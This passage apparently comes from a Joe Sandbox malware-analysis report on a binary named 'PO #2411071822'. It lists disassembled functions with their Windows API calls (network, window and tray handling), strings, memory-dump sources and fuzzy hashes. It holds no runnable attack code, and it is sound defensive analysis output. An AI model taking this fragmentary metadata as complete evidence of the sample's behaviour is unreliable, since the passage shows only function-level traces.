                                                                                                              • API ID: Window$ActiveChildEnumLongWindows
                                                                                                              • String ID: T1C
                                                                                                              • API String ID: 3814560230-3179038950
                                                                                                              • Opcode ID: d4d1e80dfb784a0fcd75678b4369e2a915662a822a62e062ae7dc51b84ee9d2b
                                                                                                              • Instruction ID: 48231f9e57e73f7b6101ee7ca736873d8d744c9fce66718db5d68cb99b98e3a5
                                                                                                              • Opcode Fuzzy Hash: d4d1e80dfb784a0fcd75678b4369e2a915662a822a62e062ae7dc51b84ee9d2b
                                                                                                              • Instruction Fuzzy Hash: A6214F75A04605DFD714DF28D850AA6B7E5EF5A320F29062AF966C73E0D734A800CF68
                                                                                                              Function 004498FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 003FD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 003FD1BA
                                                                                                                • Part of subcall function 003FD17C: GetStockObject.GDI32(00000011), ref: 003FD1CE
                                                                                                                • Part of subcall function 003FD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 003FD1D8
                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00449968
                                                                                                              • GetSysColor.USER32(00000012), ref: 00449982
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                              • String ID: static
                                                                                                              • API String ID: 1983116058-2160076837
                                                                                                              • Opcode ID: 2d8e9566ded717f4fe72b6098c2fd7c4ba47b2f8f9abd59ea6384ff0989263a4
                                                                                                              • Instruction ID: 1b308625e75b1b4d152e3400382148c3dc2c48b7125283778ebf7dd0a8bbe680
                                                                                                              • Opcode Fuzzy Hash: 2d8e9566ded717f4fe72b6098c2fd7c4ba47b2f8f9abd59ea6384ff0989263a4
                                                                                                              • Instruction Fuzzy Hash: 9A112C7251020AAFDB04DFB8CC45AEB7BA8FB08354F014529F955D2250E774E851DB54
                                                                                                              Function 00449617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 00449699
                                                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004496A8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LengthMessageSendTextWindow
                                                                                                              • String ID: edit
                                                                                                              • API String ID: 2978978980-2167791130
                                                                                                              • Opcode ID: 282230db64f6ce448929b08578ff7f3d6344f69e84335c1baa0b84488aebc793
                                                                                                              • Instruction ID: c8ccb0ccea96250d472512ad5167ffe6bc1840f5b4e3a6602df6507df0b1f5d6
                                                                                                              • Opcode Fuzzy Hash: 282230db64f6ce448929b08578ff7f3d6344f69e84335c1baa0b84488aebc793
                                                                                                              • Instruction Fuzzy Hash: 7511BC71500108ABFB205F64DC44EEB3B6AEB05378F114326F925972E0C779DC51AB68
                                                                                                              Function 00425262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 004252D5
                                                                                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 004252F4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InfoItemMenu_memset
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 2223754486-4108050209
                                                                                                              • Opcode ID: 031a072ff8ed88a274411cfa0034fd581ba95054a2708b6a7e271f1cfcb1f8fd
                                                                                                              • Instruction ID: 057b86d2120842e12a1e8c56d01b4d611939c348328377a8ee8bd4e25699baee
                                                                                                              • Opcode Fuzzy Hash: 031a072ff8ed88a274411cfa0034fd581ba95054a2708b6a7e271f1cfcb1f8fd
                                                                                                              • Instruction Fuzzy Hash: E011D375B01634EBDB10DA98E904B9E77A8AB06790F440066ED01A72A0D3B8ED04CBA9
                                                                                                              Function 00434D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00434DF5
                                                                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00434E1E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Internet$OpenOption
                                                                                                              • String ID: <local>
                                                                                                              • API String ID: 942729171-4266983199
                                                                                                              • Opcode ID: 7b485763882c5ca0fea2d2e5e1befd40d8ac9527c4f001a7289587c6b2be92de
                                                                                                              • Instruction ID: 271a9bb46e5f2c6b7c5228fc3efc3a3421dedda148eeca8aa1d2e40f12aa0a5b
                                                                                                              • Opcode Fuzzy Hash: 7b485763882c5ca0fea2d2e5e1befd40d8ac9527c4f001a7289587c6b2be92de
                                                                                                              • Instruction Fuzzy Hash: E811E070600221BBDB248F51CC89EFBFBA8FF4A351F10822BF10546240E3786941C6F5
                                                                                                              Function 0040A70C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004137A7
                                                                                                              • ___raise_securityfailure.LIBCMT ref: 0041388E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                              • String ID: (J
                                                                                                              • API String ID: 3761405300-3937933449
                                                                                                              • Opcode ID: 3033b04e866aa026bbe136cff1ec36b5dbb3e2365c39ade8d84123a54f536d3c
                                                                                                              • Instruction ID: 319fbe91620471445ddf67c7b8a544d86e55e522670e0b61ed27bb37f69872f1
                                                                                                              • Opcode Fuzzy Hash: 3033b04e866aa026bbe136cff1ec36b5dbb3e2365c39ade8d84123a54f536d3c
                                                                                                              • Instruction Fuzzy Hash: E821F3B5541304DAE700DF15E9956823FF5BB5E314F10983AE5088B3A0E3F5A980EF8E
                                                                                                              Function 0043A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0043A84E
                                                                                                              • htons.WSOCK32(00000000,?,00000000), ref: 0043A88B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: htonsinet_addr
                                                                                                              • String ID: 255.255.255.255
                                                                                                              • API String ID: 3832099526-2422070025
                                                                                                              • Opcode ID: 7437279f63e792195be49b434f5f2ab6ef4a96ff39ae62dfbc55b640e5cbe15f
                                                                                                              • Instruction ID: 17a5e2acfb375b5bf5843a1d8216c2fa74d4c5d10051a7932f4cacc830fdf24f
                                                                                                              • Opcode Fuzzy Hash: 7437279f63e792195be49b434f5f2ab6ef4a96ff39ae62dfbc55b640e5cbe15f
                                                                                                              • Instruction Fuzzy Hash: FA012674640304ABCB14EF68C886FADB364EF08314F10952BF5129B3D1D779E812C75A
                                                                                                              Function 0041B781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0041B7EF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend
                                                                                                              • String ID: ComboBox$ListBox
                                                                                                              • API String ID: 3850602802-1403004172
                                                                                                              • Opcode ID: 08254b50157c697d7d8957ff948413fd1371d454998ec1916a3a3462dafaca4b
                                                                                                              • Instruction ID: 2ef0dbcd8661f9e4ae77cc276645af99a239559f57cc0d4e4c23a2e0e9a3c3cd
                                                                                                              • Opcode Fuzzy Hash: 08254b50157c697d7d8957ff948413fd1371d454998ec1916a3a3462dafaca4b
                                                                                                              • Instruction Fuzzy Hash: 5F012871A10124BBCB05EBA4CC429FE7369FF45310710061EF471572C1EBB85909C7A8
                                                                                                              Function 0041B67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 0041B6EB
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend
                                                                                                              • String ID: ComboBox$ListBox
                                                                                                              • API String ID: 3850602802-1403004172
                                                                                                              • Opcode ID: 78e522ac752cca8df746adc37553b229f7bdc0f5db7a1fa017bc189b958afabd
                                                                                                              • Instruction ID: ca8ce07c2b0655692ab4fb88f679a5eb3c183e96fa7e6b3fa4190f4b17eaf0f6
                                                                                                              • Opcode Fuzzy Hash: 78e522ac752cca8df746adc37553b229f7bdc0f5db7a1fa017bc189b958afabd
                                                                                                              • Instruction Fuzzy Hash: AC018FB1A41014BBCB05EBA5CA52BFF73A99F15344F10002EF402A72C1EB985E1987EE
                                                                                                              Function 0041B700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 0041B76C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend
                                                                                                              • String ID: ComboBox$ListBox
                                                                                                              • API String ID: 3850602802-1403004172
                                                                                                              • Opcode ID: 17acf591280c70b4a39ddfd804f96e664d3af80638053daf2f153461a3ccf29b
                                                                                                              • Instruction ID: 6c1c355373c1d0f5edcede577c76aae05784a1e0327abe672245ea2abde7b4b2
                                                                                                              • Opcode Fuzzy Hash: 17acf591280c70b4a39ddfd804f96e664d3af80638053daf2f153461a3ccf29b
                                                                                                              • Instruction Fuzzy Hash: 0001A2B1A40114BBCB01E7A5CA02BFF73AD9F45344B10012AB401B72D2DBA85E4A87B9
                                                                                                              Function 00404D7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __calloc_crt
                                                                                                              • String ID: "J
                                                                                                              • API String ID: 3494438863-3582622258
                                                                                                              • Opcode ID: 28114113ede674fa6e296789b549a527fac72074e9ab2dcc7fd0ca2fd80a098f
                                                                                                              • Instruction ID: e22efaf91df2c1c1f32948380dd9318ca2ed380b9fe6cc3f927f19c467310b88
                                                                                                              • Opcode Fuzzy Hash: 28114113ede674fa6e296789b549a527fac72074e9ab2dcc7fd0ca2fd80a098f
                                                                                                              • Instruction Fuzzy Hash: 60F028B22182025EE7249F5EBD407A66FD4EB81724B10407FF704EA2C4E778C8415A9D
                                                                                                              Function 003E4024 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LoadImageW.USER32(003E0000,00000063,00000001,00000010,00000010,00000000), ref: 003E4048
                                                                                                              • EnumResourceNamesW.KERNEL32(00000000,0000000E,004267E9,00000063,00000000,75A90280,?,?,003E3EE1,?,?,000000FF), ref: 004541B3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: EnumImageLoadNamesResource
                                                                                                              • String ID: >>
                                                                                                              • API String ID: 1578290342-1687523914
                                                                                                              • Opcode ID: 011586deea7858851b35b54d35180e5ec14945d5dd34c2ef6da1653bb7e9545d
                                                                                                              • Instruction ID: b55531ffef0728debf694f5673f5a82b4eb7c3f285e49b6444c4f5ae16e49b82
                                                                                                              • Opcode Fuzzy Hash: 011586deea7858851b35b54d35180e5ec14945d5dd34c2ef6da1653bb7e9545d
                                                                                                              • Instruction Fuzzy Hash: 8AF09031B44360B7E2204B1ABC4AFD33EADE74ABB5F104526F615AA5E0D2F094808A98
                                                                                                              Function 00427744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ClassName_wcscmp
                                                                                                              • String ID: #32770
                                                                                                              • API String ID: 2292705959-463685578
                                                                                                              • Opcode ID: 307dff6236a5bdf5958d995bba387e235a4e022897202881d98f6ca4360d899d
                                                                                                              • Instruction ID: a220978458d03eff10cf4f9fe95d56fefa23829eda51fa82e7f324a6e01f5f61
                                                                                                              • Opcode Fuzzy Hash: 307dff6236a5bdf5958d995bba387e235a4e022897202881d98f6ca4360d899d
                                                                                                              • Instruction Fuzzy Hash: 3DE09B77B0422527DB109A95DC45E87FFACA755764F000027F905D3141E674A60187D8
                                                                                                              Function 0041A631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0041A63F
                                                                                                                • Part of subcall function 004013F1: _doexit.LIBCMT ref: 004013FB
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Message_doexit
                                                                                                              • String ID: AutoIt$Error allocating memory.
                                                                                                              • API String ID: 1993061046-4017498283
                                                                                                              • Opcode ID: fe2f468e0415cee67963df9c9030c9bf7185a2b83e96b87e28c484f4cc4d0b9b
                                                                                                              • Instruction ID: 7be7fae42a381a1c710efd51fd65fc033d971c60e1be1bfa85f568bf242982b7
                                                                                                              • Opcode Fuzzy Hash: fe2f468e0415cee67963df9c9030c9bf7185a2b83e96b87e28c484f4cc4d0b9b
                                                                                                              • Instruction Fuzzy Hash: 0DD02B313C432833D21536A96C07FD935488F05B55F180037FF0CA91D24DEAD58001ED
                                                                                                              Function 0045AE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetSystemDirectoryW.KERNEL32(?), ref: 0045ACC0
                                                                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0045AEBD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DirectoryFreeLibrarySystem
                                                                                                              • String ID: WIN_XPe
                                                                                                              • API String ID: 510247158-3257408948
                                                                                                              • Opcode ID: f8d68d4eb099fc73f8fc18c83faca376b8884393a7dca631bd37c26941b42505
                                                                                                              • Instruction ID: 376b48179ddca3e78bb820ce28e0918e25d78912834d66cf599c9a7f41e60bf8
                                                                                                              • Opcode Fuzzy Hash: f8d68d4eb099fc73f8fc18c83faca376b8884393a7dca631bd37c26941b42505
                                                                                                              • Instruction Fuzzy Hash: 7DE06570C00109DFCB12DBA5D9449EDF7B8AB48301F108196E512B2261D7B45A49DF2A
                                                                                                              Function 004486CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004486E2
                                                                                                              • PostMessageW.USER32(00000000), ref: 004486E9
                                                                                                                • Part of subcall function 00427A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00427AD0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                                              • String ID: Shell_TrayWnd
                                                                                                              • API String ID: 529655941-2988720461
                                                                                                              • Opcode ID: b4ae295007b4265b8dfa70d7d3920787f6fa96b8cb4592a58e4634356625064c
                                                                                                              • Instruction ID: 553542caca88da55af9993c769ab1212614c3472cc4da82b8230912bb3dee32d
                                                                                                              • Opcode Fuzzy Hash: b4ae295007b4265b8dfa70d7d3920787f6fa96b8cb4592a58e4634356625064c
                                                                                                              • Instruction Fuzzy Hash: C6D0A931B803247BE2246730AC0BFC62A089B08B21F10082AF206AA0D0C8E4A900861E
                                                                                                              Function 00448698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004486A2
                                                                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 004486B5
                                                                                                                • Part of subcall function 00427A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00427AD0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
